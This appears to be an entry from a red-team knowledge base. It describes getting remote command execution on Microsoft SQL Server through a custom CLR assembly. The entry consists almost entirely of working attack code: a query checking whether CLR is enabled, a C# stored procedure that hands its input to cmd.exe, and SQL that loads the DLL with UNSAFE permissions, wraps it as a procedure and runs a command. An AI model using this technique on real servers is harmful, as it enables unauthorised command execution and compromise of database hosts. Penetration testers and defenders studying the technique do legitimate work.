Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / SQL / MSSQL / EXECUTION

CLR-RCE

Use when CLR is enabled or TRUSTWORTHY DB escalation applies.

Check

SELECT name,value_in_use FROM sys.configurations WHERE name='clr enabled';

C# DLL (script)

using System;using System.Data.SqlTypes;using Microsoft.SqlServer.Server;
public class CLRExec{[SqlProcedure]public static void RunCmd(SqlString cmd){System.Diagnostics.Process.Start("cmd.exe","/c "+cmd);}}

Import & Execute

CREATE ASSEMBLY myexec FROM 'C:\CLRExec.dll' WITH PERMISSION_SET=UNSAFE;
CREATE PROCEDURE sp_cmd @cmd NVARCHAR(MAX) AS EXTERNAL NAME myexec.[CLRExec].RunCmd;
EXEC sp_cmd 'whoami';